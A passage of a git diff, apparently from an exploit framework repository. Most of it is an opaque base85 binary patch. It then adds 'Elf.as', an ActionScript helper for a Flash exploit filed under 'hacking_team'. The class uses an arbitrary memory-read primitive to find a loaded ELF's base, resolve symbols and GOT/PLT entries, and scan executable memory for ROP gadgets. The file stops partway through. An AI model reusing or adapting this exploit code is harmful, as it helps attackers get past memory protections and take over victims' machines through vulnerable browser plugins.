zjM{?b{=_K~a2ZKbGMlGT<Al3Tju6NA=tL23(6(v;<j6dBxQa3zcZ{64Jhj+tyg7&S
zXLsImkoOUO!C&gcV;vbTND7f;M2}4(8s09_<4w5QI{-9y{&4A~&eyjxNT>dyW*G6)
ztw<cfh~ZF)gq#&Daz=wpY{Ou(>Mkv>p}}RBxbYTggrUBS;M(4{%g*eDd&d0b)1y%e
zHFiD~v(1o*1t!*0&@KhHkI2ufZH%dJCm4K&?}6nDXb0e%PCxS(;wM)h+?yGeg^B#F
zP${Qx2DEY!WXzy_)!ien>eS7`W+OIgM*M|xrInvme{<cN7iFh0S%QUjH7Dw){}m}F
z*4a;VxyJn|id$wEBWnKd6t}8>5??}b`5&*iHUAEZJ6spwSi_#;<~+rn#Jo06xM>p8
z+9!eX$`c~-FzT*f==vpnIoTr;i=d=U&&ggN4CZ8?4~BAbgW-W;PYprQJk@=sm;u#&
z7L?G-@c-v32&7Y8^0|r%&sXGLsK}kH$h}yRd#NJ#az*ZyirlLexz{RkuYU;(sqIR$
zOAW&4Pl2d#P**y5W$n6>d4wxy4DPB}9?EEpxavygVU^Lgt}nqitNp4a^m6r;dl^y&
zU-QL%SotgU;cbCn*1vc-Uu3F8udeHJ7t3;bBZiiXO8augDc=yy4+z{^eFe8xU-!)O
zO>b)z$9OD`L0cRHwK#@Tag4U&5S^taL4eWxAho>-L)mJGA0HB4C>yG?_u$U80Z*?)
zc4YD`1A^hV@WkY+fj~gNDLYcCy(z$|H9<vjovx1F)MSyFB4R>O0Ftj8Zu3-uXXf(D
zHTb<KG#F8Fvi4^M-lqAyh3o9sk++)_Ro9XGMyR0ylP%A%_+88%2&g+0{KOrAzrr$(
zht~1C40`}znsG=b4Cx(1zG>L+;Fx}>=>dIcc4WN0y3chI(}fx{k;z1-P*c?t0Gorr
z<40OR4-NyqMk)3<hJmhQk7rreZf6jn-p3FN#Qrm~4}LP6X=l*tzZA3MF#BJN+3}bi
zg<04QjKWihJ3&yv1}wXmIhh%vJ=W`15AsfbKM+orJS9Lq$FeRux^SVzUl)Wk(-#h}
zvoE4>?kXKZ{I`G_48ef2a;A{8#2qN&A8T4LGyvvgy^yEHD78J-gGU;FgC`V&3P=1G
z!}#wmQCDYA#DV>7ndE-wORgmt(2ak@(}bRpsrQZQ7MRQrm^>pA?=ZFc>O!uix@DG-
zABw~*p(d);<}-$teBWpp=-2(gP!j{y*7uDlp4W_YFud=j=pJi5&6=KO3Y69{4f<$Q
zzkbJG;^DB8tWcD{E68HDFAKBIegOGSl}<leaSCsx7BG3!Ve*<6L;Tdd1cUpfm@LEO
z5lkM%WH}})Fj+~fU|Kiz;64ba@CXq8;Zb0lj!6)c5GG+vm{i*g1UM!l`WuS&=QA+>
zw6LN}y6|XgI&(2f9MeajrBloZ^t`OuCC>@K;LZ*)*~|i#>q<Py)Q$#N32O#nD1_*R
z4C<!2r7s}@jp>k8Jun2!@@de2T0kn&;>Nebwf~&YgEE2o;LioL1z<&A@<)xuKeX_M
z!T)`RffsI>PL|fY8hwWOjoSv-&MIg1?*kz{I2KrKnIjx4nwTTBa(1IXB({+DT$T<N
z`gd<uyBlKQZf?q@^=`V^^U52sWL85g>=n5yDhks<;3Aj~W;64cr7x~sTF%K&G))hF
z19bFeZN-=#)K}`*!7fJ(s{yHlVs*0H9at|HLxq>i8)xve`5I6^9I(f4C-YAwy6hRK
ztp6QPH?F2CezEM5=ShC{OsrsER-vI-VHQ^SX;9aLzo1#|Da>s22gK(Lmdj>lF_^WU
zBGY4f-E8JT<{yK2Y&rg+N0&XDWj#cVcb+ka-JY8^rVq%>WVPMpWBXY!s0Zh$mHpBb
zMStOUp4R*6-6QWEmyGEHULImFX(rB0HZz&6z@$6YKX-F4;cgzgJ*~s!>DUu6IH8=u
zf6zfLe|?EuzD}&o28Fy-BvV*THFb*gJ(afS!|0)N8vh(tyRV%5-G3bUsr`^&@Hymv
z{>PD@)(`oGpF{p13(j+{?>r-Q_9WD%UzD8ZXmp;@g7aL3D_=KO`6oPLLVRWw8xhZD
zx>@Ty0r>w>I8+Bb?2E9VN`nZvaX2hB_n;jKuh7ZN6Mz~M1l08&3inD-U<DUL8U6w1
zw%9Tkdz62P3uU9{xE!xKRI3`SD5V^<SZZmD$Mi;PV6UJS@y=o_=|sg_#ayrFUj;z8
zcM!e4FQV6X1$upm$+;eb{}Tz`>=DHJ1{GrM8jwJ)k!%P&<<i>M%V*)&g;|*I&q7t5
zeE^s9|5ciWe=Z1)W?>Ufz`r2st3{u574^5t_es}bk4~dA;u>^EZ{+h9ZZ-aQIIIVk
zt9Vo5dwUm~c!~9G&%SPKS3Lj>IS+RHL!U6X%-s$5fbXqY(gp6Fl&+yIRPA3>f9zdU
z6RC8l3om)V+iT$MgNX$~aWJ7vBmB2IpU)P12Es(sJG!L=4?=+7--KbUdeP&T(Nfe8
zzt*n{>=LnpQ-OuR%lnQNoV$;R7Z4#IVHFUx?itbV`6Et;(neu<rN9%1#%XAH((R3o
zRgR9s0&Gk}Dv#&$L?4$FNW(x&TT*b^1+sYT{;xqp56<&^sK2xkUmkOXQU1_pBUH8+
z`U`dRj^Y$CzgEy&1z};j33?88<9djtg*A}*1-J+niqZ`DW@#8Uu79h`RrKEqD!R~D
z(E)Y#MpVLfwWOnCRdf~K@RZcMQriZudmD3G(GP56@`7l6SRe#3$ReSFCT}nLlW}U%
zH*8}Lv;f?_D(>~ThXbjDu*R$CU#{~|1%lgI;V>DHH>+Ob4yrk@*!X6(rs#+6Q#CNv
ze=T(ODUaSjBHYFjT|#N}pv6UK2}02(2oCz>kR1MIlchwz0zuAs;pNom5XhbLb6OM@
zvM54<sD>#ET(dWy4=l^)*XHxv^7*~KJx(BreWk>PYbiAmZy4FkR+d;Q)JBpZL5ea_
z#VygI3SDu$U5rm471|j4Hu8r{@F0IsZdy+)6DnTH7FJ3(^N6T@C7;j5xYrt{1d5~I
zg+Zpm8)GBkFI4e&g}U#~kdsG+QcfrxtOfTH^@Z=^yn^uWR}1%~%YBWB*4Z^s@BmCH
zjG7c?Qkn8RNHbDf@Nm0PFZQr(&fbN}@sL`IY$mHA2xGoYHJ#Mp%rra^V#6(^zIlZR
zB4#>Z4pv|~0duH`0U}dWJwQZSb{eUj1`u&FD}|F;C7N~`f%csSUQ>6A)@}iRHyW)Q
z4fwmmXx(A7tcH+vH4Snq5&3$N$n-BHQr37HNFf-yw%B+Uhej$kDyuY|boi3!tCNrr
zu%%8Jcw3e{W#EINQwHQgM`ox2kk3@r3t5jcOpjsUn%Zq-4so!A*w++418dnDky$Gs
zKF1iW-agFA3Q}5T83^uu*1S$=h(F3PWW)`0)*0U1!?f)1Vhf~ubp_qjE+exE+Ml5I
z!1zoR@4G1s&SDrmOT~aR0(r;IvTXB96l~2_g9C!06`t1zN^JuEn(_7lZIL^b_CR6b
ziW#V(zvK6ii7EHAg>#6?m7_qZ!4dxmRM$-#z>!Zc`VGM3(t<E%)=BfU2^NxLdi#Ke
zwnz+g9p7a9vH>(a)X-Lyj<l{3tZFZWQ)${k?KRRyI$XOvpHBy29CK7%1VfuNZ(YrG
z;Hl>QW@5ci?`Z%RogWBt$>9Y`VuR4IMw)I<HwYD~W?fkS5-+d-_RV78Y}2gKl@CH}
z7wVD^nO$v0Iv5{lB2RKMV2!ShHY46%-Nv1?L8lf`Sb?iC(@AkQ7NvRhFz6I&etxCv
zp_13h=hwp<_{?F3_p$LtT<)isxh^@?>~g#0G}AkpXt@|p^Y1B%i(wTei(!^w#%&#6
z%H&$xSr*n9z4<w&rBMs!f=>&Ez7HFj%wqy}3vv}sRXX@xg$3JVy~F!tr-?<Iu=Dyp
zkXHgU4-`SqVZeYzP$R9w9D(-CQ-drRnh)CJ$mftyd!R3MF`SDRRy|Y@OIe2pP&rc5
zjwr}n&J?Zh8mPR-xcnfD=!P~uUI-V{x`bsjhOQaF8D?UmP;G}fa+Zl*MDRl9d9OE^
z(KO6($W6GQPk}Z(C};R%f!SPhFH_TD81j5_VPL`8)G6j<6TfFlygqT((19k5VF9>?
zP-ujc*~~KIjl>~C8P}US#wb4#dvRMgiPUC+thKzve7jkw>Ut>jcX4nbeR7VO+9L3@
zZL9FyTVfl`?Kh$R75rTv2m>4yrW*~|(C#pxX%5{Gx^|dxm*yDyc^LdlC}gF!i`3Pb
z$3<#~pf{@9Me`FvNj(Yuf#r+l`wcYtMQSJ%VyD&OOVD_GExs~|x9?~87&P9#TX-)(
z2VLO-=ugztL-^=WO-uv#NR3<eGkOBLpQ%2X+ZL!mfZmsox5uZ51#b_f3$c{>rPHvq
zxE5qH$FM+c*~$FZDM*Di?PLK^DCldqu#~3VLiHKF?P1kp^=^ZP4*(}xIgX8u<~>5e
zCoYW&-y#$>q-++7rVFuCD1nG+?h=Y#WtvY4C0MI$6-sD7Q}zlaJV@Cm6gEiNE)-+8
zP<9A~4^q0+fDsHWLr;k64z3G)Ut0*AOc*!B$hw0%x0Chd=nYLSvzNvG3Z39ymT5QI
z1E9mP|AgmP=oP)zQ3$FHShhpx`S*hZ3>Pv71QLZ^A!|O#w7ntN{swDZ*r{VbagYW9
zKU*WfhIX^&NrvL$-m&1f7vq^`=x(&*&%zyjPUb?m15bmFLI|`*RMR#C;86-ta%2Ai
zvqu=ATjKRian(M;5aWP5?4r)Rh8WZzVStEM`4kB0c;>!@mSEg9I__}vqF`N1RSn$n
zWN!fp$J=8ls-vE$Vjz)fa$>lk1aTkaVMD3-#@Jti=sXwaxZq{OxO}8T<Jx%CLZR`r
zF%+qRU>GtH#=Tmar3OquT2ZjZTewl(lg~5G3^bc`$S<R1Vi~RYwA=HzaZ#38C-Ev%
z$tig|*rT3|VQ`Po`e^zMeB`4lp6ud-velwRgC+VY(WI&Veqp()!5rLzBk#q<vd2>T
zu<<z9!9{4^b3;3N9T#7}-l7Mp-veHC7Qj>B6>3l=p9C%`n|PTiWo`+ISE?F#>2D$B
zKBU|Wve63z83&`shib5D>O(vF+#Jyl>ecT8eSG!@1Xih9Bp7<%4?b~LLYRbc9$1`~
zv>3)%S?0|TLa4QU*im#1Z9g4YH)zogV$bPdVeYCi@|uY9E=+QmP`?C1NIo6L*~Nq0
zpo6O?ZUWNbac!nIuVz}{ymC-|j`M2JymD{u7|p9GXkJYwXkNp9S(^RITUA`ph)=_t
z{N;Nu?2B`?Kgj3fFz{}&i|a^5bBTAog<ePgQU^sN4CvD^Dk0Qdt?FTKXY1gO-LD$-
z<k14w=vPgIaO04}<tQ~46f~E3ki)(L3>Jv2QG?(#esXDdM5EXlOc>GwLjGcgt|CNE
z0+pW8X#%P_(I;(B+|O08xxE-5hB0!W-qxx*sKr<N8{8pL*<Td;i((M7j@mR_+9rT|
zw#p_j#R)nHSpTJ)aA?A@$p&ijwSMF<ygxZ4o)(IH)a-_qk5S9|FOVQiOsaYURNn|O
zOfY0Y_2&1Ol8X<-T|&-DJP(_c0TdTGZsIk}K;=!O3@J3}<19w+9_#Jnp23k1s6t#S
zl6eMp6+Mpp7VgQ&x5K6ka)nJ<ubVlHTN^iX1os?z7TspE%K{KF(H>$m`Hqpabo8WN
z<#IXhRB(4!%s@d@P(E{1+zBc`w?SLf03#0L?H9wnVC`ssPUaXH`Jeknegl@Z92ah;
zgSnZptogXmaB*=n_kynpM;X=&r$gWjZV88~Pl4%#SqMGCPR}C%hg;PExWhZa;e1Y9
zqSahm8B-KPlC03^^;aP->2)bCaVahV^4l;1)o%qq>4?H7G6&dQ1MBMSr&){ZN2S$u
z_D<H4E3XlQ8v9X%+f}^!swoS;lBW$=zD{Eh_Bcka`Vip$wBck<2)r$<hGApYZ9Rc&
z(+-$|fX<6mK)6p(tFM){>UFEDy#usWrc>HWyA6HvJp*dwU>l5!+LLO<wbxFya3a&=
zkEEu~{s6h&rS@}Sw_DXAyq2k6*z)y>nR2N)5as%;NIfTfB>YF;L_qFmeYDc-0Xxt`
zr}VPDTfp19#Y*4tKwA8a2U6G=#XEj3u+os954ggH?zY{yhpPICiVF!+9Hn?9TR!x5
zdLP10FYt4-fY5wIq~#;bM({;(^GAl}^^UKD3m@5-^zBL?eZtb}{h_Z`=pz{{$5*jg
z{A|VJ9;u<%`#F!^tkS17L;McHKqb-6Rc{z~SN(k%{=4c;1=N7V1*SkgTJ14Wfh6!E
zQ>tIb9<M-}hVUP$wO@_{AQ|30fZ9;y#Al4Irwe`fOjHh!*KYO4#)z6pV>3$R%|D5}
z;gP>POxVJQPrUZPMa1f{+pzs*oewROOrih&srM3f*eVTpPT;4J&kOvf`32ZHhfMP%
z?3{JZpM{-sK<O3uapa2vKLL6PHqK0WS>Pu?ufV>UDX$7egp}8WVg{7gg%SxUZwRGo
zkn&rh3>c#9g*YjokI0Vnw=v#Pz1womaB?^^=L{7MVQ(NuA1c7y;r3-8SP<E}gDVAo
z%D2^|Px<7l^bsFa*{|Y*f^X0k$)(T{k6&Gi9KqV40~d+I);Nb}16CgI4ISDmfwdi|
zH1Ma$jQ<?W_&h$sIBz6BHZ0Zt*hqe2SepHbk-T770sDfH{M4{?`%@$NnPCO(&y3_n
z!wT6K(drMXfnY%YigzJ_XC-)$H$cG;SaO*+$=vBmBCXfHLodY-sk#X0%XKf{2zsaP
zurup`joJ5<_94Bg^Ts`W&gG-WKeUUWC?({_8{y~?)sHpa6p6Ql0`zh~qUJleOOo46
z-0-^ftsk@KO@vu4YG8qK-OOnwx0_w9r&+X+PczJ>K8F6IV^pY&Jv87}j*i`15oIZf
zw*{@_z;F)guJupAK~mkZIGz`M2!wFl2;q7gz;`LBPmt<RRmlNVYNL0@Kv=M|YdynK
z7qH3&hz|gQD%D;Ut-GPR)PrC9EK7ZgwU1)$PqFrQu?m-uiuL|+0+&0?Qb)n{4b?+E
z^b=;O%9CYP^!2fU$p1N?f3Jssz#c9dYl_v>ZrbINY=K26y9XxzJj2;U8K*uY#795{
zrUW*9)p$>ihJZD^f^@L;O@VUHLG1yI&cdiqiU`BC@?zd?{)8!L6;IPq<WNxBI~Dsw
zhUqyvaQuki^UPD`XH>k$JWqRn2uXUg(9yWQ==bp$&K-(h?R><X!~;T&-GUJiWPrQO
z??mA=91uTyQ{04xN|{2H#5+O(W^V~-)tg{n5nx(23lp1oR}eQ@5EsGc5I*n0z*FW7
zlWGmjRyLJ~+-a7Wz*YN<U(nqU^FBd1%gA&Gmg*rcaUa*H?%DFXXZopoh9xFK-LtqV
z9|ke$!R;i0UM!~lR!iP+km2UMp?Ne08g%=3h6L{Q;iJwH%4>0sT2O5F5yf^5#n=up
zE{SpwG;>RB0F5>e?J)2=?gf4*6>r-KqIE!PO7+iE9}Zgfdvy13gf3{R@QWx|-W*JD
zw|tb)_`Cr|<-k9X3HN2<z(1^WObvwf;LCJC+6%6wFHR=|Wqo7DM|4_h^Y4XL-$=TG
zp&pJgR0v6e6@!Eb!0qU{B^0cF6-E?dK_~WSB^836=(tbCZ-k3#RNt7(mG^`4EMo+e
z#Y2=;ps8sB`zh%QAn@KrqT*l`oT{4P#VUpA$74jOT16*^pbM1^1`fv_eXRq9ys4st
z?rOh>v((_jaxOu=Jw%a9yw^IePQztm(*RgE#&W63J*M1i%6+EXZ^{Fve9DvuO?k+a
zPn+@?Qyw<u5mO#D<uOwpH)Yn8jwxMJ=1h6Qls%^GHD#YEpEc!krhML%FPQSADPJ_@
zOQw9;l&_d~UT2Tx$#ER|u~g{E(x5LZ0KHi{^k)U3M=Jz<T4CtbV$iQ;K+hJ3zAXX0
zTiCx90S>Gx;K3RITv$=y!>R^OtQhcO4Fqni8sNvO1&*viz>_r?xU#MSzO1W(GiwO&
zW?ci^S=R!8RvmC?4Fw*pVZfyo9~HO9@#MW+z6v~zhIEuFUjvp$%hwTn11gV}zlC<A
z<(uXxO}<5CZ)4f-2z&>@cL{tK!S`S=qvh`r`~zX%NAUF$$qxwp0KroPo<i_6jC`~_
zgWy@ho<;CO0zX9X9D(N${0PJ{TAoMnW01yZ`3Zs-sKNyVKPB)p1jh>m#|r>25;l+6
z_6UOQ5dg<VaNJ`N97ou32;NKJy$Fscumi#S2%Lc6#E3OyG^7CDPuTkrd>~>4M$1VE
zK1kRH5qyZcn2g{Q0;eK4jVeq>u#><U2+kyMCW5mFoQ2?QqB{q{xrCjE;QWYXj+P4$
zTu9i3M15fd=IP-`QQ(URy9ldw5q2?xOCna)Xt@-@WrSUZ;3E-BjFyigxSX&n5L`(V
zRw39;;A#ZdP=&P!t|M?Am94|>*O#QaAz}^kNj?^_3?JMWv99vLO%dyAAKV<VqCU8#
z#L3nYxQ*y;LvVX(gpZdh?1)(L(eeodpNv?c(Q+q(yCOw}*iGPDr0s8^M(-iSUaYo{
z!2JjwAn*W!PZ4+!!9ykaJzWByDS?Me;Dl12M@rz)5_l|9G=$?NFiYSbHcB1!Bl}*S
z9M7c#gQls2xduPtf-=Zl1pLSe#Gy)&^~xT^VSBP**^3a`D-Ds%l?;^xBl{xYdC*wN
zOy#p!1+A2nk<^E@j?7g)hgnn;GFkaNLN8!)5)+&W`64Db!SW@9(4I+~$g1San4n>k
z(voq&d|94_lWogaBG3X&n^co@PQFTmiGc4z%^+)+uOsdaOn!^Wn-Oq@Xewkn@-0l>
z#st+~{w@MO@*T{gK9Nq-)Pi1v-+UJ#bQbbGgno}z(2bD3z$8KP2ZY|o<O3Rh1UxNj
zG&vS|8YP5&MV_GnVuHSfyo&q~p>vo_kAPc7pF&nIKf>fZCg@z`$C!MA2|5_EE3yx=
z4DvMc0#5v=Sa66~!vy_~yod=p81g+bkJ-7zMwR6$sT^Acf<+yb;}CZ*CgU;bz~nwm
z(17HGDo7?`_I^wrz+_SttR1M-@<Gf#gvn$~reHD^lWCYtud=QkHBq(4^JE8yRRb0a
zSZZMGb+~v8m7P_Pz&s2c6$I<W(qUK{1pC_%0fz~!gE|a??2IZov&x$cb(A(rw>$93
zN|pk)TeBlm9o)(MLA1yEa`76xo>UuiE+Oz%(#NF6@)nlX6HJAY#QOqYlsGEByRQcd
z<9!OfZbf~!qPj~R-Uik0Ep(U~$Gx7~^jy5#3lP$JygTNzQR=dz0S{nrlDIj{RYtET
z=y*zIN49+6A5YcR*{4{`DL*%;&K}Zo+RqHGv-7w|?okWx_n*b)nhDL%i1=Ms+552g
zx&98eo~K~`#}JkmMhW2sUg#QowU$ZTaVa94#8tfNz<9nB!X_Q#jy-)?o-3BWo6qOm
z0RlJ8IlP@eE3`%$+6(xNzW!5+iRmyDH>HlGXH+O02SWW=0^4~ZFl{;S@v6}aoLoAX
z8jES>L+=#*L$NoAr>M2B<@0H%R|VU=oQvD+4myH8scJBZzsZio*JMV0qcOZO`YY(5
zS3V?M|Mk&dz+h)rx&G^;Z$fU4pVR1N(p*0mpqEMW{G48VnG~cq5<#Y2voxO%cIETs
z{{c!-UQ~4$_rLj<k45>?IYJ+Z$lvF?mIC8S1vbV8gFgA033T;HHKX|9N8$Pse-6fQ
zTAt@}epNcyB^Ok6$;qPWd9L9@B9ssQ9#RjACs%s{W(=h9lB#*982C8K<H70Zvs4Is
z@R&L0banLMg^OEz3Z@VmybRGsKyUNjNQFTC=_#ZO+jFlqhP!=E*(6<$Or?YPqaOIa
zZVJcS`zc(*Ks=YGpAzyXtT&%eg)-+vJeT-L;F-@Wpr!%+MgKvTF}zI-?;GBx4{r<B
z`%mdz@1TOgG!G;JQ8##Uk)-!%s8T#SmENduj|C)?)~mmXPYJCNHNZtZaCrk|lQnd&
zI12)z7$N@FE7wu!>)QlQF8l!=(jxXP4Blhc<As&8*4Ngwu@?XDjOoy?fKhr&6UJa4
z@HIX<Z2)dBPxCaZwLOu(T4~;|6;Gef`!;-aojn%q@pZNEea<Ph@PW=|BYxKqyB2V#
z`!nG)bW9ErOUqQAn93ot{Fvg+vzOsNA^e9#Bo037h><zYtML}>h|x0HXqs#&t;e~C
zhKlDZnf|Ek4cU3RM8((3{@wEw!>jZ$UAa%AEB9DmynPtBTYTPu?`=XY7X*a8V5NBZ
z8O~;=7~|Sl^iGURSvouvy>)8Xg!W;m`il&@fxMM2-{%<Zk%qRQOAl=7@qtYmGKIUG
zhPKeJ3X>Dsh(|flWWLdO3kz3+B{Igsc#rrAsC6*(PZgXE>-8dJ<RpZ4??uQ(PB6-z
zV&J8fa7b}<XhIj75HUMm#OzjsBDD;2nue)Ri1l5k^;6NZ$#9!C87T1!Ws>`p?v;u!
zk(c5Oen#)Q=m=oCL62nMFAW-%666OoE|%VY&Ba%0`F`8XH`=f9+FS#5+O=Yv1=wb6
zDgQ9$$CdJ3n7^0uSNk+gpXNrxe-DPQM@uc1Vv7z9W%{7zby2vFTVP<UKHJFA%StEL
z{HUSbjxA(Y6`kBFHFP8QnLuRIXW;ce6K%nki=yeGP}(mFm{EEq=YRx&jg|;q=ru*u
z_DJg-!#f+UqG(@a+D%Nyn%y+<A-8p$nQfVAG|e;=dj@_$VPx(#Q(9)cna!*<@E7Sy
zxLG`#Szm#>mL5N@tH5=bnfsveE>@15U}h#(Ao0ap^CR?V=RSOu8p3acN<-?)ea?vF
znyTC;6jlzP`qumZlo5P6Zrxn-119o1K|@PUcsk+zkPJ+EHJu~EjN;weYSA({H8?Yq
zHw~tD64^MiH5{jTxZQ=x!<fuPRh~!+67|W^>y}jpI)?kTfEF|^;;TyNK6VD_6K}Ch
z5iE`IWItm(+0QJU>~GvB`x|!=$zoQaLnhlnynD(E<!3CLd5j3tdl~$uu7|#<tHWOm
z0f`LpS~pKJ6~BgBUIR*Cz<!BVR)RviJ@7B9)V1o{e4epiJ)&j_dP#j#eTN|B0h)~O
z;8pla<8voqx&g`TE6u_r6n5y>z9D;)T4sF%z26J!G@3d=#irw@SccO&-|$Sg9;wwA
zs1-V&QRuvYn0_guvw*<Y$QnM?sR0HWdNQ+&-Mx<6I?G@h{hY}|RCq(7a8Ic)3t4au
zq&6!^Z6<3WJ!rg1>&f8WOL+F@EOpHUV7@qAeZI&8zDKP78i;T(JzOik*&7@HYA(Il
zbLqvNE7w((KTf_xL2{QVNC}e~n#qDTZZHbZ*h;LK;Kaeai+WOG4TXG}Xm8i5udhc%
zSgk&(?(tM&iiQugMuIExgnr2ouKYfFs#bWR-EYGJgI@DO?y^VLL<B$mtVdn=LMb|#
z2hGYi-qSUIy>qge*+%P8dVoy|&`eYxHp<22^<UJcFJP3cq^z$QME3{2uJlWrnmDP!
z8*#~O8SEselW3%<B3`d$L}zNHNA|O{iXG8xt+cMs(eO#?PYUb$7Q>;L&1N1i>P6vc
zeI=&zGR(BgFf%JK(A(V7I=l_n;dvxwMlZp)p@`>G1^V)1i;<a!brw{h<|Arh1!^Ip
z9<D$wLe!!P)M7++RiKt3YOz*)YzKpH?lw?(O8^xN9rVl>H(Fba=H=+wwi?y6XMy}`
z10T+BHGEEEwIz=?tza465AG3<v7h<iVk7o9rK&|E^7)Q^$Dh*a-jp_Yy=RsfphoE;
zOxm6f_Up%@K8FszFo&fbAKfg~G#L0*ILfX5whM-^28J*kh5!|okqb|GV!)*U{}xrj
zTWJU}{Zd5drHE;lB4!p5__(oPSiraA>*}K#YUGdcCkae1uDGVoehBvVX4(6kYwPOl
z$wteRavc8T-LRIaexspvcBj!Yt-Qi8sIUpgx10oUYx$#|X&juQJ&h-)b2*vY(|NL!
zgX6S2d2$AqV-0%-PtN4B!?0)KA<YUc#6sb#z2{*Vw%!rUrbG4)*ffUiC$Nu|&_^hY
z&$}~E81zII{x+tjo2goSFt!R-icokMdA3e7wNj*3iBz{pfpuqqN@g=_8jP>RyS2g(
z{LP@DXd_eC!hd(gakPV>pVc&$;pJnQ#bqbAXYtDi1@+fxp>QZX@N&+fY^@dsrs}-U
zQ7-4IX{UkD{nimnSL06)RIqd%va}QFtk>{H_*kHvso7l4<o0ZyoWtd8ZqMP#xm?cW
z_FSHv$K`x(&*RDYTrTAHe4bpu<sxn`;K_wtF6Q<^o_v_grQCj)Cl_(~2)7sUWEYpq
zx!uK+i@99M?ZrH~gv)MjFX73hT(05vQl4DK<vMOJ<H<+3+`#Qec=Ay$H*)(?o?Oo5
zW^OO%$rW5~<@O4mT*>8jZm;CYRb1}i_9~w2=JH8yck|?GE_ZQzHBYYLau2uH@Z?%9
z_i=kIPp;$g0Jqoi<a#a-a(g{bZs781Zg1ep$GAMq?Z<d>BbP_Hy^$w3ae18En|N|F
zmkzf#^W+vTbKKs-lUup$;r7-tz1zlRAGf#h<aREf<Mwu*e4NXP+<u%VcW`-<+dFvj
z2`*pa_7gn$B$uyn`$?YM$>nR@-pP}@xO{`#yLfUpmv3@=H&5>2@@;PK;mN&RzQgUk
zJh_j{_qe@}C--yt2X61@$pc(|!0iJ(`4pF@x&0JR9^~>Yw-2K3Y{1X6LWZY1ci?vb
zk7+t+A81p{u9C(y?K1GS+D0<uS}2=U&=c*h>p@3$p^j|Q3O_J%h~KHS9zyz?E0?A%
zTJd)se51ah&fblUw`zq`!l$&t3Bw#SewSrmgHK+FG&uI;aUO3yj+75oQhvHfd9F|S
z#ya~5QhrABKV2?qZWgSF+gT)YSi_f_0}2Ab2$41eN3@_uL1)X*q7<^3qejzEy?rPh
z=N;7wKLI+gB#e3x#!zT}OzY=J<hZ7>;+K?;{k)NN?PrZ_&dyR~>OvZ{PZ(&tC&}#`
zGqTxCpJDf6>#SD%wUJ}EvN@%E7V~Z??_xez%AdgeiBi57^F12g@Oz6hb<kU?@GMs7
yE9IZZ{IjL}Nz6Z|6+Q->?~8nRoqatJGI1xbeE-*@@BYP4$0)Y}{C@yz$&;W|r8+PG

literal 0
HcmV?d00001

diff --git a/external/source/exploits/hacking_team/Elf.as b/external/source/exploits/hacking_team/Elf.as
new file mode 100755
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/hacking_team/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
